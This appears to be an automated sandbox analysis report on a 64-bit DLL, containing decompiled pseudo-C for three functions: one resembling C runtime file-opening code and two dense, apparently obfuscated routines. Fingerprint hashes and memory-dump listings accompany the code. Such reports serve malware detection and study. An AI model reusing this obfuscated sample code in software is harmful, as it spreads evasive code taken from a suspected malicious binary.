                                				_t135 =  *((intOrPtr*)(0x13124970 + (__ecx >> 6) * 8));
                                				if (( *(_t135 + (__ecx << 6) + 0x38) & 0x00000080) == 0) goto 0x130f2076;
                                				r15d = 0x74000;
                                				if ((r15d & r8d) != 0) goto 0x130f1e93;
                                				_t140 = _t161 + 8;
                                				 *(_t155 + 0x50) = 0;
                                				_t99 = E00007FFC7FFC130F4DDC(_t81, _t135, _t140);
                                				if (_t99 != 0) goto 0x130f2091;
                                				if (_t99 != 0) goto 0x130f1ece;
                                				asm("bts edi, 0xe");
                                				r15d = 2;
                                				if ((_t87 & r15d) == 0x4000) goto 0x130f1ee4;
                                				_t15 = _t140 - 0x10000; // 0x64000
                                				if ((0xffffbfff & _t15) == 0) goto 0x130f1ed2;
                                				_t18 = _t140 - 0x20000; // 0x54000
                                				if ((0xffffbfff & _t18) == 0) goto 0x130f1edf;
                                				_t21 = _t140 - 0x40000; // 0x34000
                                				_t47 = _t21;
                                				if ((0xffffbfff & _t47) != 0) goto 0x130f1ee6;
                                				 *__r9 = 1;
                                				goto 0x130f1ee6;
                                				_t88 = _t87 | _t47;
                                				goto 0x130f1e93;
                                				if ((_t88 & 0x00000301) != 0x301) goto 0x130f1ee6;
                                				 *((intOrPtr*)(__r9)) = r15b;
                                				goto 0x130f1ee6;
                                				 *__r9 = 0;
                                				if ((_t88 & 0x00070000) == 0) goto 0x130f2076;
                                				if (( *__rdx & 0x00000040) != 0) goto 0x130f2076;
                                				_t51 = __rdx[4] & 0xc0000000;
                                				if (_t51 == 0x40000000) goto 0x130f1f20;
                                				if (_t51 == 0x80000000) goto 0x130f1f4b;
                                				if (_t51 != 0xc0000000) goto 0x130f2076;
                                				_t52 = __rdx[8];
                                				if (_t52 == 0) goto 0x130f2076;
                                				if (_t52 - r15d <= 0) goto 0x130f1f3e;
                                				if (_t52 - 4 <= 0) goto 0x130f1f91;
                                				if (_t52 != 5) goto 0x130f2076;
                                				if (0 == 0) goto 0x130f2019;
                                				r8d = 3;
                                				 *(_t155 + 0x50) = 0;
                                				_t53 = E00007FFC7FFC130F5864(0, r14d, 0xc0000000, _t96, _t135, __rbx, _t155 + 0x50, _t157);
                                				if (_t53 <= 0) goto 0x130f1f6c;
                                				_t91 =  ==  ? 0 : 1;
                                				if (_t53 == 0xffffffff) goto 0x130f1fb6;
                                				if (_t53 == r15d) goto 0x130f1fcd;
                                				if (_t53 != 3) goto 0x130f2006;
                                				if ( *(_t155 + 0x50) != 0xbfbbef) goto 0x130f1fcd;
                                				 *_t149 = 1;
                                				goto 0x130f2019;
                                				r8d = r15d;
                                				E00007FFC7FFC130F5D68(_t135, _t140, _t155 + 0x50);
                                				if (_t135 == 0) goto 0x130f201d;
                                				r8d = 0;
                                				E00007FFC7FFC130F5D68(_t135, _t140, _t155 + 0x50);
                                				if (_t135 != 0xffffffff) goto 0x130f1fc2;
                                				E00007FFC7FFC130EE6A0(_t135);
                                				goto 0x130f2078;
                                				goto 0x130f1f43;
                                				if (( *(_t155 + 0x50) & 0x0000ffff) != 0xfffe) goto 0x130f1fe6;
                                				_t59 = E00007FFC7FFC130EE6A0(_t135);
                                				 *_t135 = 0x16;
                                				goto 0x130f1fb6;
                                				if (_t59 != 0xfeff) goto 0x130f2006;
                                				r8d = 0;
                                				E00007FFC7FFC130F5D68(_t135, _t140, _t165);
                                				if (_t135 == 0xffffffff) goto 0x130f1fb6;
                                				 *_t149 = r15b;
                                				goto 0x130f2019;
                                				r8d = 0;
                                				E00007FFC7FFC130F5D68(_t135, _t140, _t165);
                                				if (_t135 == 0xffffffff) goto 0x130f1fb6;
                                				_t127 =  ==  ? 0 : 1;
                                				if (_t127 == 0) goto 0x130f2076;
                                				 *(_t155 + 0x50) = 0;
                                				if (_t127 == 0) goto 0x130f203d;
                                				if ( *_t149 - 1 != 1) goto 0x130f204a;
                                				 *(_t155 + 0x50) = 0xfeff;
                                				goto 0x130f204e;
                                				 *(_t155 + 0x50) = 0xbfbbef;
                                				if (3 <= 0) goto 0x130f2076;
                                				r8d = 3;
                                				r8d = r8d;
                                				_t62 = E00007FFC7FFC130F4A0C(0, r14d, 0, 3, _t95, 0, _t137, _t155 + 0x50, _t149);
                                				if (_t62 == 0xffffffff) goto 0x130f1fb6;
                                				if (3 - 0 + _t62 > 0) goto 0x130f204e;
                                				return 0;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _get_daylight_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 474895018-0
                                • Opcode ID: be638d611d0ffe0b5027be264a8367b695c78b4831f7ebfcc585b6cae8fb1a0e
                                • Instruction ID: 4b015c7c32101a0cbddf5a22a90db8bd5acd295058e13ea61ab62ed8d8ac4537
                                • Opcode Fuzzy Hash: be638d611d0ffe0b5027be264a8367b695c78b4831f7ebfcc585b6cae8fb1a0e
                                • Instruction Fuzzy Hash: 18712922F0CA6A43F73889299E4033962C9AF4137CF144674DA5DA76D2DF3DE861C720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 23%
                                			E00007FFC7FFC130E83C0(signed int __ebx, void* __edi, signed int __rax, signed int __rcx, long long __rdx, signed int __rsi, long long __rbp, signed long long __r8, signed int __r10, long long __r12, signed int _a8, signed int _a16, signed int _a24, unsigned long long _a32) {
                                				long long _v48;
                                				long long _v56;
                                				long long _v64;
                                				long long _v88;
                                				signed long long _v96;
                                				signed long long _v104;
                                				long long _v112;
                                				signed char* _v120;
                                				signed long long* _v128;
                                				signed int _v136;
                                				char _v144;
                                				signed long long _v152;
                                				signed int _v160;
                                				long long _v168;
                                				long long _v176;
                                				long long _v184;
                                				signed long long _v192;
                                				signed long long _v200;
                                				signed int _t273;
                                				void* _t285;
                                				signed int _t286;
                                				signed int _t287;
                                				long long _t299;
                                				intOrPtr _t306;
                                				intOrPtr _t307;
                                				signed short _t319;
                                				signed char _t326;
                                				signed long long _t351;
                                				intOrPtr _t404;
                                				intOrPtr _t405;
                                				long long _t406;
                                				intOrPtr _t407;
                                				signed long long _t409;
                                				intOrPtr _t414;
                                				signed long long _t416;
                                				intOrPtr _t418;
                                				signed long long _t419;
                                				signed long long _t420;
                                				signed long long _t421;
                                				signed int _t423;
                                				signed long long _t426;
                                				signed long long _t427;
                                				long long _t431;
                                				intOrPtr _t433;
                                				signed long long _t434;
                                				signed long long _t435;
                                				signed long long _t437;
                                				signed long long _t438;
                                				intOrPtr _t445;
                                				signed long long _t447;
                                				signed long long _t448;
                                				signed long long _t449;
                                				signed long long _t455;
                                				long long _t460;
                                				long long _t461;
                                				signed long long _t463;
                                				intOrPtr _t467;
                                				signed long long _t472;
                                				signed long long _t479;
                                				signed int _t480;
                                				signed long long _t485;
                                				signed long long _t487;
                                				unsigned long long _t490;
                                				signed long long _t491;
                                				unsigned long long _t495;
                                				long long _t497;
                                				signed long long _t507;
                                				signed long long _t517;
                                				long long _t525;
                                				signed long long _t526;
                                				signed long long _t529;
                                				signed long long _t533;
                                				long long _t549;
                                				long long _t550;
                                				signed long long _t552;
                                				signed long long _t554;
                                				long long _t555;
                                
                                				_t512 = __r8;
                                				_t326 = __ebx;
                                				_t447 = __rcx + 1;
                                				_v136 = _t447;
                                				_v96 = __rax ^ 0x00001b22;
                                				_t404 =  *0x13124138; // 0x0
                                				_t555 = __rdx;
                                				_v112 = 0x1a42;
                                				r13b = 0xa0;
                                				_t497 =  *((intOrPtr*)(_t404 + (__rcx + __rcx * 2) * 8));
                                				 *0x13124148 =  *0x13124148 - 1;
                                				_t405 =  *0x131241a8; // 0x0
                                				_v88 = _t497;
                                				r10d =  *(_t405 + 0xabb) & 0x000000ff;
                                				_t406 =  *((intOrPtr*)(__rdx + 0x500));
                                				_t533 = __r10 | _t447;
                                				 *((long long*)(__rdx + 0x110 + (_t447 + _t447 * 2) * 8)) = _t406;
                                				_t448 = _t447 + 1;
                                				_v104 = _t533;
                                				_t455 = _t448 + _t448;
                                				 *((long long*)(__rdx + 0x500)) = _t406;
                                				_t407 =  *0x13124140; // 0x0
                                				 *((intOrPtr*)(_t407 + _t455 * 8)) =  *((intOrPtr*)(_t407 + _t455 * 8)) + 0x1065;
                                				_t409 =  *0x13124158; // 0x0
                                				r14d =  *0x131241a0; // 0x0
                                				 *0x13124170 = __rdx;
                                				if (r14d != ( *(_t409 + _t447) & 0x000000ff)) goto 0x130e8b61;
                                				_v48 = __rbp;
                                				_v56 = __rsi;
                                				_t351 = _t554 + _t554;
                                				_a8 = _t554 + _t554 * 2;
                                				_t44 = _t554 + 0xf; // 0xf
                                				r8d = _t44;
                                				_v64 = __r12;
                                				_t47 = _t555 + 0x100; // 0x1d2
                                				_a24 = _t554 * 4;
                                				_a32 = _t351;
                                				_a16 = r8d;
                                				asm("o16 nop [eax+eax]");
                                				_t273 = r14d -  *0x13124194;
                                				_t525 = _t47 + _t448 * 8 + 8;
                                				 *0x13124194 = _t273;
                                				_t507 = _t351;
                                				_t552 = r14d;
                                				_v120 = _t525;
                                				r9d =  *0x13124130 & 0x0000ffff;
                                				_v128 = _t533 + _t448 * 8 + 0xc0;
                                				 *0x1312416c = _t273 / _t455;
                                				_t63 = _t512 + 0x61d; // 0x62c
                                				r8d = r13b & 0xffffffff;
                                				_t449 = _t448 + 1;
                                				_t71 = _t554 - 0x7e; // -126
                                				_v144 = _t71;
                                				_v152 = 0xc74;
                                				_v160 = _t63;
                                				_v168 = _t525;
                                				_t526 = _t552;
                                				_v176 = ( *(_v136 + _t449 * 2) & 0x000000ff) + r14d;
                                				_v184 = 0x8c;
                                				_v192 = __r8;
                                				_v200 = _t449;
                                				 *((intOrPtr*)(_t497 + 0xab3 + _t449 * 4)) = E00007FFC7FFC130E5CC0(__ebx & 0x000000ff, __edi, _v136, __rdx, _t449, _t526);
                                				 *0x13124130 =  *0x13124130 + 0x90e;
                                				_t485 =  *0x13124198; // 0x0
                                				r8d =  *0x13124194; // 0x0
                                				 *0x13124198 = _t485 | _t485 ^ 0x00001f9f;
                                				_t460 =  *0x13124170; // 0x0
                                				_t461 = _t460 + 1;
                                				_t414 =  *0x13124160; // 0x0
                                				 *0x13124170 = _t461;
                                				r9d =  *(_t414 + _t507) & 0x000000ff;
                                				_v144 = ( *(_t555 + _a8 * 8) & 0x000000ff) + r8b;
                                				_v152 = 0x1561;
                                				_v160 = r14d | 0x00001797;
                                				_v168 = _t526 - _t461;
                                				r9d = 0x14c7;
                                				_v176 = 0x4de - r8d;
                                				_v184 = 0x184d;
                                				_v192 =  *0x13124134 &  *0x13124158;
                                				_v200 = 0x7b217;
                                				_t285 = E00007FFC7FFC130E5CC0(0x28, __edi, _a8, __rsi | 0x00001a94, _t485 | _t485 ^ 0x00001f9f, _t526 - _t461);
                                				 *0x13124134 =  *0x13124134 * 0xde0;
                                				if ( *0x13124170 - 0x1518 < 0) goto 0x130e8a08;
                                				if (( *0x13124190 & 0x0000ffff) -  *((intOrPtr*)(0x1658 + _t449 * 4)) > 0) goto 0x130e8a08;
                                				if (_t285 - 0x1827 <= 0) goto 0x130e8919;
                                				_t416 =  *0x131241a0; // 0x0
                                				_t463 = _v104;
                                				if ( *((long long*)(_t463 + _t416 * 8)) - 0x8c8 > 0) goto 0x130e8919;
                                				_t487 = _a16;
                                				if ( *((intOrPtr*)(_t555 + _t487 * 8)) - _t463 < 0) goto 0x130e8878;
                                				_t418 =  *0x13124140; // 0x0
                                				if ( *((intOrPtr*)(_t418 + _t507 * 4)) - r14d < 0) goto 0x130e8878;
                                				_t286 =  *0x1312414c; // 0x0
                                				_t287 = _t286 + 1;
                                				 *0x1312414c = _t287;
                                				r10d = r10d & 0x00001d8d;
                                				_t419 = _t552;
                                				 *(_t555 + (_t287 + _t287) * 8) = _t419;
                                				_t549 =  *0x13124170; // 0x0
                                				 *0x13124120 =  *0x13124120 ^ (r14w & 0xffffffff) + (r14w & 0xffffffff);
                                				_t550 = _t549 +  *((intOrPtr*)(_t555 + _t419 * 8));
                                				 *0x1312416c = ( *0x1312416c & 0x0000ffff) + 1;
                                				_t420 =  *0x13124140; // 0x0
                                				_v184 =  *(_t555 + _t449 * 8) & 0x000000ff;
                                				_v192 = _t552;
                                				_v200 = 0x4a4;
                                				_t299 = E00007FFC7FFC13100D70(( *(_t420 + (_t287 + _t287) * 4) & 0x000000ff) + r14b, _t420, _t550, _t552 | 0x00001d0f,  *((intOrPtr*)(_t555 + _t420 * 8)), _t550);
                                				_t517 = _a8;
                                				 *((long long*)(_t555 + _t420 * 8)) = _t299;
                                				_t421 =  *0x131241a8; // 0x0
                                				 *_v128 = _t487;
                                				if ((r13b & 0xffffffff) == r14d) goto 0x130e8859;
                                				if ((_t421 ^ _t552) -  *((intOrPtr*)(_t555 + _t517 * 8)) < 0) goto 0x130e8859;
                                				_t423 =  *0x131241a0; // 0x0
                                				_t467 =  *0x131241a8; // 0x0
                                				if ( *((intOrPtr*)(_v136 + _t507)) != ( *(_t423 + _t467) & 0x000000ff)) goto 0x130e8ae9;
                                				 *0x1312416c = ( *0x1312416c & 0x0000ffff) * (r14w & 0xffffffff);
                                				goto 0x130e8aec;
                                				_t306 =  *0x13124148; // 0x0
                                				r9d = 0xf5c;
                                				 *0x1312414c =  *0x1312414c ^ 0x01d2c800;
                                				_t307 = _t306 + 1;
                                				 *0x13124148 = _t307;
                                				r8d = 0x1567;
                                				_v184 = 0xf3;
                                				_v192 = 0xb23;
                                				 *((intOrPtr*)(_t307 +  *0x131241a8)) =  *((intOrPtr*)(_t307 +  *0x131241a8)) + ( *_v120 & 0x000000ff |  *0x13124120 | 0x0000001a);
                                				_t426 =  *0x13124150; // 0x0
                                				 *0x13124133 = 0x28;
                                				_v200 = _t426;
                                				 *0x13124124 = E00007FFC7FFC13100D70(( *0x13124133 & 0x000000ff) + 0x00000080 &  *0x13124123, _t426,  *(_t555 + _t552 * 8) + 0x105b, _t517,  *((intOrPtr*)(_t555 + _t420 * 8)), _t550);
                                				 *((long long*)(0x1786 + _t449 * 8)) = 0x95e;
                                				goto 0x130e8aec;
                                				_t490 =  *0x13124124;
                                				r13b = r13b + 1;
                                				_t427 =  *0x13124128; // 0x0
                                				_t472 = _t427 + _t490 * 4;
                                				 *_t472 =  *_t472 ^  *(_t555 + _t490 * 8);
                                				 *0x13124124 =  *0x13124124 - 1;
                                				 *0x13124158 = _t552;
                                				 *(0x7e1 + _t472 * 8) =  *(0x7e1 + _t472 * 8) & (_t427 ^ 0x00000a78);
                                				_t529 =  *0x13124170; // 0x0
                                				r8d =  *0x13124132 & 0x000000ff;
                                				 *0x13124170 = _t529 - 1;
                                				_t491 = _t490 >> 0xb;
                                				 *0x1312416c = ( *0x13124120 & 0x0000ffff) * (_t517 & _t529 | _t552) / _t491 * 0x1639;
                                				_t431 =  *0x13124138; // 0x0
                                				 *((long long*)(_t431 + _t552 * 8)) = _t431;
                                				_t433 =  *0x13124138; // 0x0
                                				 *0x13124180 = _t491 *  *(_t433 + 0xa760) * _t449 ^ 0x00000510;
                                				goto 0x130e8aec;
                                				_t434 =  *0x131241a0; // 0x0
                                				r9d =  *(_t555 + _t552 * 8);
                                				r9d = r9d + _t326;
                                				_t435 = _v112;
                                				r8d =  *0x13124132 & 0x000000ff;
                                				_v128 = _v128 - 8;
                                				_v120 = _v120 - 8;
                                				_v144 = 0x64;
                                				_v152 = _t552;
                                				_v160 = r9d;
                                				r9d = 0x775;
                                				_v168 =  *0x13124124;
                                				_v112 = _t435 - 1;
                                				_t437 = _v96;
                                				r11d =  *(_t437 + _t552 * 2) & 0x0000ffff;
                                				_v176 = _t550;
                                				_v184 =  *0x5139;
                                				_v192 = _t435 ^ 0x00000eae;
                                				_v200 =  *(_t555 + _t434 * 8) ^ 0x000019a2;
                                				_t319 = E00007FFC7FFC130E5CC0(_t326 & 0x000000ff, r13b & 0xffffffff, _t437, _v136 &  *0x13124180, (_t517 & _t529 | _t552) - _t491 * 0x1639, _t529 - 1);
                                				_t495 = _a32;
                                				 *0x13124120 = _t319;
                                				 *((char*)(_t495 + _v136)) = 0xfb;
                                				r13b = r13b ^ 0x00000075;
                                				 *(_t555 + _a8 * 8) = _t495;
                                				goto 0x130e8aec;
                                				_t479 = _t437;
                                				r8d = _a16;
                                				r14d = r14d + 1;
                                				r8d = r8d + 1;
                                				_t438 =  *0x13124158; // 0x0
                                				_a24 = _a24 + 4;
                                				_a8 = _a8 + 3;
                                				_a16 = r8d;
                                				_a32 = _a32 + 2;
                                				if (r14d == ( *(_t438 + _t479) & 0x000000ff)) goto 0x130e8520;
                                				r13b = r13b + 1;
                                				 *(_t555 + (_t449 - 1) * 8) = _t495;
                                				_t480 =  *0x131241a0; // 0x0
                                				 *((long long*)(_t555 + _t479 * 8)) = _t480 - (_t495 >> 0xc) * 0x1aba -  *((intOrPtr*)(_t555 + _t479 * 8)) - 0x12b0;
                                				_t445 =  *0x13124150; // 0x0
                                				 *0x13124198 = _t445 -  *0x13124198;
                                				return  *0x1312416c & 0x0000ffff;
                                 			}

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                 • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: b19b34ea825deaec7f67e3e56fdf8c6bf6a2b00dbacc86478291ffe791470b8c
                                • Instruction ID: 03365f991a28cfd7dbac68412356b9580d32b9b5315ab21b75e9b8360de7fc11
                                • Opcode Fuzzy Hash: b19b34ea825deaec7f67e3e56fdf8c6bf6a2b00dbacc86478291ffe791470b8c
                                • Instruction Fuzzy Hash: 01225A32A58FA985F7108F16E8407A97BB1FB99768F214136DA8D63764DF3CE060CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 96%
                                			E00007FFC7FFC13100D70(signed int __edx, signed int __rax, void* __rcx, signed int __r8, long long __r9, void* __r11, signed char _a8, signed int _a16, long long _a24, long long _a32, intOrPtr _a40, intOrPtr _a48, signed int _a56) {
                                				signed char* _v80;
                                				long long _v88;
                                				void* _v96;
                                				long long _v104;
                                				signed int _v112;
                                				long long _v120;
                                				signed long long _v128;
                                				signed short _v134;
                                				signed char _t242;
                                				signed int _t253;
                                				signed int _t264;
                                				signed int _t274;
                                				signed short _t309;
                                				signed short _t353;
                                				signed int _t354;
                                				void* _t375;
                                				void* _t377;
                                				intOrPtr _t386;
                                				signed long long _t387;
                                				signed int _t393;
                                				signed long long _t394;
                                				signed long long _t396;
                                				signed long long _t398;
                                				signed long long _t399;
                                				signed long long _t403;
                                				intOrPtr _t406;
                                				signed long long _t411;
                                				intOrPtr _t414;
                                				signed long long _t419;
                                				signed char* _t422;
                                				long long _t427;
                                				intOrPtr _t431;
                                				intOrPtr _t434;
                                				signed long long _t436;
                                				signed long long _t438;
                                				signed long long _t439;
                                				signed long long _t450;
                                				intOrPtr* _t452;
                                				void* _t459;
                                				signed short* _t460;
                                				signed long long _t464;
                                				signed long long _t466;
                                				signed long long _t468;
                                				signed long long _t469;
                                				signed long long _t471;
                                				signed char* _t472;
                                				signed int _t474;
                                				signed long long _t475;
                                				void* _t477;
                                				signed long long _t479;
                                				intOrPtr _t482;
                                				signed long long _t484;
                                				signed long long _t486;
                                				void* _t488;
                                				long long _t490;
                                				signed long long _t492;
                                
                                				_a32 = __r9;
                                				_a24 = __r8;
                                				_a16 = __edx;
                                				_t460 = _t459 - 0x48;
                                				r11d =  *0x13124148; // 0x0
                                				_t452 =  *0x13124168 -  *0x131241a0;
                                				_a8 =  *0x13124124 & 0x000000ff | 0x00000040;
                                				_t242 = (_a56 & 0x000000ff) + 1;
                                				r8d = __edx & 0x000000ff;
                                				r15d = _t242 & 0x000000ff;
                                				r14d = _t242 & 0x000000ff;
                                				_a56 = _t242;
                                				_t475 = __r11 + __r11;
                                				r11d = r11d + 1;
                                				_t471 = r11d;
                                				_v112 = __r8;
                                				_v134 = r14w;
                                				 *0x13124148 = r11d;
                                				r11d = r11d + 1;
                                				_t353 =  *(__r8 + _t471 * 4) & 0x0000ffff;
                                				 *_t460 = _t353;
                                				_v88 = _t452;
                                				_v120 = __rax;
                                				r10d =  *(__rax + __rcx) & 0x000000ff;
                                				_v128 =  *(__r8 + __rax * 4) ^ 0x000009e7;
                                				_t422 = __rcx - 1;
                                				_t472 =  &(_t422[_t471]);
                                				_v80 = _t472;
                                				_t427 = _a48 +  *0x13124170;
                                				 *0x13124148 = r11d;
                                				r8d = _t422[0xae] & 0x000000ff;
                                				asm("cdq");
                                				_t479 = _v128;
                                				_t253 =  *0x13124134; // 0x0
                                				asm("cdq");
                                				_v96 = _t427;
                                				 *(__r8 + 0x14 + _t479 * 4) = _t253 %  *(__r8 + 0x14 + _t479 * 4);
                                				r8d =  *_t472 & 0x000000ff;
                                				_v104 = _t427;
                                				 *_t472 = _t253 /  *(__r8 + 0x14 + _t479 * 4) / __r8;
                                				asm("cdq");
                                				r9d = 0xffff;
                                				_t386 = _a40;
                                				 *0x13124133 =  *0x13124133 + 0x1a99 %  *0x13124124;
                                				if ( *((intOrPtr*)(_t386 + 0x2368)) - 0xc < 0) goto 0x13101113;
                                				_t436 =  *0xabf;
                                				if ( *((intOrPtr*)(_a32 + _t436 * 2)) - ( *0x13124132 & 0x000000ff) <= 0) goto 0x1310110d;
                                				if (r14w - ( *(_t386 + _t422) & 0x000000ff) < 0) goto 0x13100f37;
                                				_t387 =  *0x131241a0; // 0x0
                                				if (( *0x13124123 & 0x000000ff) ==  *((intOrPtr*)(__r8 + _t387 * 4))) goto 0x131010ce;
                                				_t484 =  *(__r8 + r11d * 4) % r8d - 1;
                                				if ( *((intOrPtr*)(0x390 + _t486 * 8)) !=  *((intOrPtr*)(_v96 + _t484 * 4))) goto 0x131010ce;
                                				_t490 = _t488 + 0xb1f;
                                				_v96 = _t490;
                                				if (_t475 != _t490) goto 0x131010ce;
                                				 *(_t479 + _t422 - 1) = ( *0x13124122 & 0x000000ff) / ( *(_t479 + _t422 - 1) & 0x000000ff);
                                				 *(__r8 + 0x20 + (_t486 + _t486 * 2) * 4) =  *(__r8 + 0x20 + (_t486 + _t486 * 2) * 4) ^ r13d;
                                				_t393 =  *0x131241a0; // 0x0
                                				_t394 = _t393 - 1;
                                				 *0x131241a0 = _t394;
                                				_t100 = _t436 - 0x15bf; // -5567
                                				_t309 = _t100;
                                				_v104 = _t427;
                                				r11d =  *(_a40 + _t394 * 4);
                                				_t264 = _a16 & 0x000000ff;
                                				_a8 = _t264;
                                				if (r11d - _t264 < 0) goto 0x13101198;
                                				r10d =  *0x13124148; // 0x0
                                				r12d = _a8;
                                				_t354 = _t353 & 0x0000ffff;
                                				asm("o16 nop [eax+eax]");
                                				_t474 = r10d;
                                				_t438 = r11d;
                                				r8d =  *(_t438 + _a32) & 0x000000ff;
                                				r8b = r8b -  *(_t474 + _t422);
                                				r8b = r8b + 0xd;
                                				 *(_t474 + _t422) = r8b;
                                				r9d = _t354;
                                				r10d =  *0x13124148; // 0x0
                                				r10d = r10d + 1;
                                				 *0x13124148 = r10d;
                                				if (_t354 != _t309) goto 0x131010a6;
                                				r12d = 0xbcf7;
                                				_t396 =  *0x13124178; // 0x0
                                				r9d = r9d + 1;
                                				 *(_t396 + _t438 * 2 + 0x1a) =  *(_t396 + _t438 * 2 + 0x1a) | _t309 & 0x0000ffff ^ r11w ^  *__r8;
                                				r10d =  *0x13124148; // 0x0
                                				_t464 = _t309;
                                				 *0x13124194 =  *0x13124194 ^ _t396 % _t464;
                                				if (r9d == _t309 - 1) goto 0x13101050;
                                				r12d = _a16 & 0x000000ff;
                                				_v104 = _t427;
                                				r11d = r11d + 1;
                                				if (r11d - r12d >= 0) goto 0x13101000;
                                				r14d = _v134 & 0x0000ffff;
                                				_t492 = _v96;
                                				_t482 = _a24;
                                				goto 0x13101198;
                                				_t398 =  *_t452;
                                				_t439 =  *0x13124170; // 0x0
                                				 *(0xaef + _t398 * 8) = _t439 & _t475;
                                				 *0x13124124 =  *0x13124124 |  *(_a40 + _t398 * 4);
                                				_t274 =  *0x13124148; // 0x0
                                				 *((char*)(_t274 + 0x1e + _t474)) = 0xe8;
                                				goto 0x13101198;
                                				r9d = 0xffff;
                                				_t399 =  *0x131241a0; // 0x0
                                				r14w = r14w + r9w;
                                				 *_t460 = ( *_t460 & 0x0000ffff) + r9w;
                                				 *(_v120 + 0x10 + _t492 * 8) =  *(_a40 + _t399 * 4) |  *((intOrPtr*)(_v120 + 0x2820)) + 0x00001540;
                                				r8d =  *0x13124124; // 0x0
                                				 *0x131241a0 =  *0x131241a0 - 1;
                                				r8d = r8d - 1;
                                				 *0x13124124 = r8d;
                                				_t466 = r8d +  *0x131241a8;
                                				 *0x1312414c =  *0x1312414c ^ _t492 + _t464 & _a8 & 0x000000ff;
                                				 *0x13124134 =  *0x13124134 ^ r14w & 0xffffffff;
                                				 *_t466 = (sil & 0xffffffff) -  *_t466;
                                				 *0x13124124 =  *0x13124124 + 1;
                                				_t403 = _v112;
                                				r9d = 0xc;
                                				if ( *((intOrPtr*)(0xabf + _t403 * 8)) - _t474 >= 0) goto 0x13101260;
                                				_t153 = _t482 + 0x44; // 0x44
                                				_t477 = _t153 + 4;
                                				r9d = r9d + 1;
                                				r14w = r14w + 0xffff;
                                				 *(_t482 + 4 + _t403 * 4) =  *(_a48 + _t403 * 2) & 0x0000ffff;
                                				r8d =  *0x13124120 & 0x0000ffff;
                                				 *((long long*)(0xabf + _t492 * 8)) = _t403 - 0x1419;
                                				r8d =  *_t422 & 0x000000ff;
                                				_t468 = (_t466 << 4) +  *0x13124188;
                                				 *_t468 =  *_t468 * (_a56 & 0x000000ff);
                                				if (r9d -  *((intOrPtr*)(0xabf + _v112 * 8)) > 0) goto 0x131011e0;
                                				r11d = _a16 & 0x000000ff;
                                				r8d =  *_t422 & 0x000000ff;
                                				r10d = r11d;
                                				_t406 =  *0x13124188; // 0x0
                                				if ( *((intOrPtr*)(_t406 + _t468 * 4)) - r11d > 0) goto 0x131012cb;
                                				if ( *0x131241a0 - 0x69 <= 0) goto 0x131012cb;
                                				if (_t492 - 0x238 <= 0) goto 0x131012cb;
                                				_t375 =  *0x13124168 -  *0x13124158; // 0x0
                                				if (_t375 >= 0) goto 0x131012cb;
                                				r8b = r8b + 1;
                                				 *_t422 = r8b & 0xffffffff;
                                				 *(_v88 + ( *0x13124168 +  *0x13124168) * 8) =  *0x13124168 +  *0x13124168;
                                				 *(_v80 - 1) = r11b;
                                				goto 0x13101386;
                                				if (( *(_t477 - 4) | _t484 + 0x00000001) !=  *((intOrPtr*)(_t482 + 0xff8))) goto 0x131012e6;
                                				_t377 =  *0x13124130 - 0xab1; // 0x0
                                				if (_t377 <= 0) goto 0x1310130e;
                                				_t411 =  *0x131241a0; // 0x0
                                				if ( *((intOrPtr*)(_a40 + _t411 * 4)) ==  *((intOrPtr*)(0x268 +  *0x13124124 * 8))) goto 0x13101410;
                                				r9d =  *(_a40 + _t468 * 4);
                                				if (r9d - 0x13b4 >= 0) goto 0x13101410;
                                				asm("cdq");
                                				 *0x13124170 =  *0x13124170 + 0x921 / r9d;
                                				_t414 =  *0x13124128; // 0x0
                                				_t450 =  *0x13124124;
                                				 *((intOrPtr*)(_t414 + _t450 * 4)) = 0;
                                				_t469 = _t477 - 0x1ad7 + ((_a56 & 0x000000ff) + 0x00000001 & 0x000000ff);
                                				 *0x00080260 = _t469;
                                				r8d = ( *_t460 & 0x0000ffff) + ( *(_t482 + 0xaa0) & 0x0000ffff) + (r11b & 0xffffffff) & 0x0000ffff;
                                				sil = sil + 1;
                                				 *0x13124158 = 0x167a;
                                				_t431 = _a32;
                                				_t419 = _t450;
                                				 *0x13124150 = _t419;
                                				 *(0x268 + _t469 * 8) =  *(0x268 + _t469 * 8) ^ 0x000007d8;
                                				sil = sil |  *0x131241a0;
                                				sil = sil | 0x000000d8;
                                				sil = sil -  *(_t419 + _t431);
                                				 *(_t419 + _t431) = sil;
                                				goto 0x13101428;
                                				_t434 =  *0x13124140; // 0x0
                                				return ( *(_a48 + _t469 * 4) & 0x0000ffff) -  *((intOrPtr*)(_t434 + _t469 * 4));
                                 			}
